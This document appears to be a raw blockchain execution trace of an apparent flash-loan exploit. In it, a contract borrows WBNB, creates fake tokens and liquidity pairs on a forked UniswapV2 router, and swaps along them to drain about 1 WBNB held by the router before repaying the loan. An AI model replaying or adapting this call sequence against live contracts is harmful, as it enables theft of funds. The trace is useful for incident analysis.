[1][CALL] from=0xa81894, to=0x4d8056, start() -> None
  [2][STATICCALL] from=0x4d8056, to=WBNB, balanceOf((address): 0x0fe261) -> 4255116038496504727456
  [2][CALL] from=0x4d8056, to=DPPAdvanced, flashLoan(baseAmount(uint256): 4255116038496504727456, quoteAmount(uint256): 0, assetTo(address): 0x4D8056, data(bytes): b'\x00') -> None
    [3][CALL] from=DPPAdvanced, to=WBNB, transfer(dst(address): 0x4D8056, wad(uint256): 4255116038496504727456) -> True
    [3][CALL] from=DPPAdvanced, to=0x4d8056, DPPFlashLoanCalladdress() -> None
      [4][CALL] from=0x4d8056, to=WBNB, approve(guy(address): 0x24cEFA, wad(uint256): 115792089237316195423570985008687907853269...) -> True
      [4][CREATE] from=0x4d8056, to=0xd771dc, atInversebrahint248() -> 0x608060
      [4][CREATE] from=0x4d8056, to=0x2f11f3, atInversebrahint248() -> 0x608060
      [4][CREATE] from=0x4d8056, to=0x6047ac, atInversebrahint248() -> 0x608060
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, addLiquidity(tokenA(address): 0x2F11F3, tokenB(address): 0x6047ac, amountADesired(uint256): 1000000000000000000, amountBDesired(uint256): 1000000000000000000, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['1000000000000000000', '1000000000000000000', '999999999999999000']
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Factory, getPair((address): 0x6047ac) -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Factory, createPair(tokenA(address): 0x2F11F3, tokenB(address): 0x6047ac) -> 0x1e3444
          [6][CREATE2] from=UniswapV2Factory, to=UniswapV2Pair, atInversebrahint248() -> 0x608060
          [6][CALL] from=UniswapV2Factory, to=UniswapV2Pair, initialize(_token0(address): 0x2F11F3, _token1(address): 0x6047ac, _router(address): 0x24cEFA) -> None
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['0', '0', '0']
        [5][STATICCALL] from=UniswapV2Router02, to=0x2f11f3, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0x2f11f3, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0x2f11f3, balanceOfaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0x6047ac, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0x6047ac, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0x6047ac, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, mint(to(address): 0x4D8056) -> 999999999999999000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1e3444, token(address): 0x2F11F3) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1e3444, token(address): 0x6047ac) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, migrator() -> 0x000000
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, addLiquidity(tokenA(address): 0xbb4CdB, tokenB(address): 0x6047ac, amountADesired(uint256): 1000000000000000000, amountBDesired(uint256): 1000000000000000000, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['1000000000000000000', '1000000000000000000', '999999999999999000']
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Factory, getPair((address): 0x6047ac) -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Factory, createPair(tokenA(address): 0xbb4CdB, tokenB(address): 0x6047ac) -> 0x60cb79
          [6][CREATE2] from=UniswapV2Factory, to=UniswapV2Pair, atInversebrahint248() -> 0x608060
          [6][CALL] from=UniswapV2Factory, to=UniswapV2Pair, initialize(_token0(address): 0x6047ac, _token1(address): 0xbb4CdB, _router(address): 0x24cEFA) -> None
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['0', '0', '0']
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 5877594874198698
        [5][CALL] from=UniswapV2Router02, to=WBNB, transferFrom(src(address): 0x4D8056, dst(address): 0x24cEFA, wad(uint256): 1000000000000000000) -> True
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 1005877594874198698
        [5][STATICCALL] from=UniswapV2Router02, to=0x6047ac, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0x6047ac, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0x6047ac, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, mint(to(address): 0x4D8056) -> 999999999999999000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x60Cb79, token(address): 0x6047ac) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x60Cb79, token(address): 0xbb4CdB) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, migrator() -> 0x000000
      [4][STATICCALL] from=0x4d8056, to=WBNB, balanceOf((address): 0x24cEFA) -> 1005877594874198698
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, addLiquidity(tokenA(address): 0xbb4CdB, tokenB(address): 0x2F11F3, amountADesired(uint256): 1000000000000000000, amountBDesired(uint256): 1000000000000000000, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['1000000000000000000', '1000000000000000000', '999999999999999000']
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Factory, getPair((address): 0x2F11F3) -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Factory, createPair(tokenA(address): 0xbb4CdB, tokenB(address): 0x2F11F3) -> 0x1418ab
          [6][CREATE2] from=UniswapV2Factory, to=UniswapV2Pair, atInversebrahint248() -> 0x608060
          [6][CALL] from=UniswapV2Factory, to=UniswapV2Pair, initialize(_token0(address): 0x2F11F3, _token1(address): 0xbb4CdB, _router(address): 0x24cEFA) -> None
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['0', '0', '0']
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 1005877594874198698
        [5][CALL] from=UniswapV2Router02, to=WBNB, transferFrom(src(address): 0x4D8056, dst(address): 0x24cEFA, wad(uint256): 1000000000000000000) -> True
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 2005877594874198698
        [5][STATICCALL] from=UniswapV2Router02, to=0x2f11f3, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0x2f11f3, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0x2f11f3, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, mint(to(address): 0x4D8056) -> 999999999999999000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0x2F11F3) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0xbb4CdB) -> 1000000000000000000
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, migrator() -> 0x000000
      [4][STATICCALL] from=0x4d8056, to=WBNB, balanceOf((address): 0x4D8056) -> 4253116038496504727456
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, addLiquidity(tokenA(address): 0xbb4CdB, tokenB(address): 0xd771DC, amountADesired(uint256): 4253116038496504727456, amountBDesired(uint256): 4253116038496504727456, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['4253116038496504727456', '4253116038496504727456', '4253116038496504726456']
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Factory, getPair((address): 0xd771DC) -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Factory, createPair(tokenA(address): 0xbb4CdB, tokenB(address): 0xd771DC) -> 0x59f351
          [6][CREATE2] from=UniswapV2Factory, to=UniswapV2Pair, atInversebrahint248() -> 0x608060
          [6][CALL] from=UniswapV2Factory, to=UniswapV2Pair, initialize(_token0(address): 0xbb4CdB, _token1(address): 0xd771DC, _router(address): 0x24cEFA) -> None
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['0', '0', '0']
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 2005877594874198698
        [5][CALL] from=UniswapV2Router02, to=WBNB, transferFrom(src(address): 0x4D8056, dst(address): 0x24cEFA, wad(uint256): 4253116038496504727456) -> True
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 4255121916091378926154
        [5][STATICCALL] from=UniswapV2Router02, to=0xd771dc, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0xd771dc, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0xd771dc, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, mint(to(address): 0x4D8056) -> 4253116038496504726456
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xbb4CdB) -> 4253116038496504727456
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xd771DC) -> 4253116038496504727456
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, migrator() -> 0x000000
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, swapExactTokensForETHSupportingFeeOnTransferTokens(amountIn(uint256): 1009142973824618974, amountOutMin(uint256): 0, path(address[]): ['0xd771DCC836d69F45E8eD604BE03a26bdF4be26..., to(address): 0x4D8056, deadline(uint256): 1640857356) -> None
        [5][STATICCALL] from=UniswapV2Router02, to=0xd771dc, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0xd771dc, transferFromaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=0xd771dc, balanceOfaddress() -> 0x000000
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['4253116038496504727456', '4253116038496504727456', '1640857356']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, swap(amount0Out(uint256): 1005877594874198698, amount1Out(uint256): 0, to(address): 0x24cEFA, data(bytes): b'') -> None
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xbb4CdB) -> 4252110160901630528758
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xd771DC) -> 4254125181470329346430
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['1000000000000000000', '1000000000000000000', '1640857356']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, swap(amount0Out(uint256): 500713969559457445, amount1Out(uint256): 0, to(address): 0x24cEFA, data(bytes): b'') -> None
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0x2F11F3) -> 499286030440542555
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0xbb4CdB) -> 2005877594874198698
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['1000000000000000000', '1000000000000000000', '1640857356']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, swap(amount0Out(uint256): 0, amount1Out(uint256): 332982850350793558, to(address): 0x24cEFA, data(bytes): b'') -> None
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1e3444, token(address): 0x2F11F3) -> 1500713969559457445
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1e3444, token(address): 0x6047ac) -> 667017149649206442
        [5][STATICCALL] from=UniswapV2Router02, to=UniswapV2Pair, getReserves() -> ['1000000000000000000', '1000000000000000000', '1640857356']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, swap(amount0Out(uint256): 0, amount1Out(uint256): 249240175764266647, to(address): 0x24cEFA, data(bytes): b'') -> None
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x60Cb79, token(address): 0x6047ac) -> 1332982850350793558
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x60Cb79, token(address): 0xbb4CdB) -> 750759824235733353
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 4255121916091378926154
        [5][CALL] from=UniswapV2Router02, to=WBNB, withdraw(wad(uint256): 1005877594874198698) -> None
          [6][CALL][1.0058775948741987] from=WBNB, to=UniswapV2Router02
        [5][CALL][1.0058775948741987] from=UniswapV2Router02, to=0x4d8056
      [4][CALL] from=0x4d8056, to=WBNB, deposit() -> None
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, factory() -> 0x1daed7
      [4][STATICCALL] from=0x4d8056, to=UniswapV2Factory, getPair((address): 0xd771DC) -> 0x59f351
      [4][CALL] from=0x4d8056, to=UniswapV2Pair, approve(spender(address): 0x24cEFA, value(uint256): 115792089237316195423570985008687907853269...) -> True
      [4][STATICCALL] from=0x4d8056, to=UniswapV2Factory, getPair((address): 0x2F11F3) -> 0x1418ab
      [4][CALL] from=0x4d8056, to=UniswapV2Pair, approve(spender(address): 0x24cEFA, value(uint256): 115792089237316195423570985008687907853269...) -> True
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, removeLiquidity(tokenA(address): 0xbb4CdB, tokenB(address): 0xd771DC, liquidity(uint256): 4253116038496504726456, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['4252109908735340563605', '4254124929184541004757']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, transferFrom(from(address): 0x4D8056, to(address): 0x59f351, value(uint256): 4253116038496504726456) -> True
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, burn(to(address): 0x4D8056) -> ['4252109908735340563605', '4254124929184541004757']
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xbb4CdB) -> 4252110160901630528758
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x59f351, token(address): 0xd771DC) -> 4254125181470329346430
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 4254116038496504727456
        [5][CALL] from=UniswapV2Router02, to=WBNB, transfer(dst(address): 0x4D8056, wad(uint256): 4252109908735340563605) -> True
        [5][STATICCALL] from=UniswapV2Router02, to=0xd771dc, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0xd771dc, transferaddress() -> 0x000000
      [4][CALL] from=0x4d8056, to=UniswapV2Router02, removeLiquidity(tokenA(address): 0xbb4CdB, tokenB(address): 0x2F11F3, liquidity(uint256): 999999999999999000, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x4D8056, deadline(uint256): 1640857356) -> ['2005626030826926247', '499223413252492206']
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, transferFrom(from(address): 0x4D8056, to(address): 0x1418Ab, value(uint256): 999999999999999000) -> True
        [5][CALL] from=UniswapV2Router02, to=UniswapV2Pair, burn(to(address): 0x4D8056) -> ['499223413252492206', '2005626030826926247']
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0x2F11F3) -> 499286030440542555
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Router02, getTokenInPair(pair(address): 0x1418Ab, token(address): 0xbb4CdB) -> 2005877594874198698
          [6][STATICCALL] from=UniswapV2Pair, to=UniswapV2Factory, feeTo() -> 0x9589d6
        [5][STATICCALL] from=UniswapV2Router02, to=WBNB, balanceOf((address): 0x24cEFA) -> 2006129761164163851
        [5][CALL] from=UniswapV2Router02, to=WBNB, transfer(dst(address): 0x4D8056, wad(uint256): 2005626030826926247) -> True
        [5][STATICCALL] from=UniswapV2Router02, to=0x2f11f3, balanceOfaddress() -> 0x000000
        [5][CALL] from=UniswapV2Router02, to=0x2f11f3, transferaddress() -> 0x000000
      [4][CALL] from=0x4d8056, to=WBNB, transfer(dst(address): 0x0fe261, wad(uint256): 4255116038496504727456) -> True
      [4][STATICCALL] from=0x4d8056, to=WBNB, balanceOf((address): 0x4D8056) -> 5373864536961094
      [4][CALL] from=0x4d8056, to=WBNB, withdraw(wad(uint256): 5373864536961094) -> None
        [5][CALL][0.005373864536961094] from=WBNB, to=0x4d8056
      [4][CALL][0.005373864536961094] from=0x4d8056, to=0xa81894
    [3][STATICCALL] from=DPPAdvanced, to=WBNB, balanceOf((address): 0x0fe261) -> 4255116038496504727456
    [3][STATICCALL] from=DPPAdvanced, to=BEP20Token, balanceOf(account(address): 0x0fe261) -> 1881070976235199692724948
    [3][STATICCALL] from=DPPAdvanced, to=WBNB, balanceOf((address): 0x0fe261) -> 4255116038496504727456
    [3][STATICCALL] from=DPPAdvanced, to=BEP20Token, balanceOf(account(address): 0x0fe261) -> 1881070976235199692724948
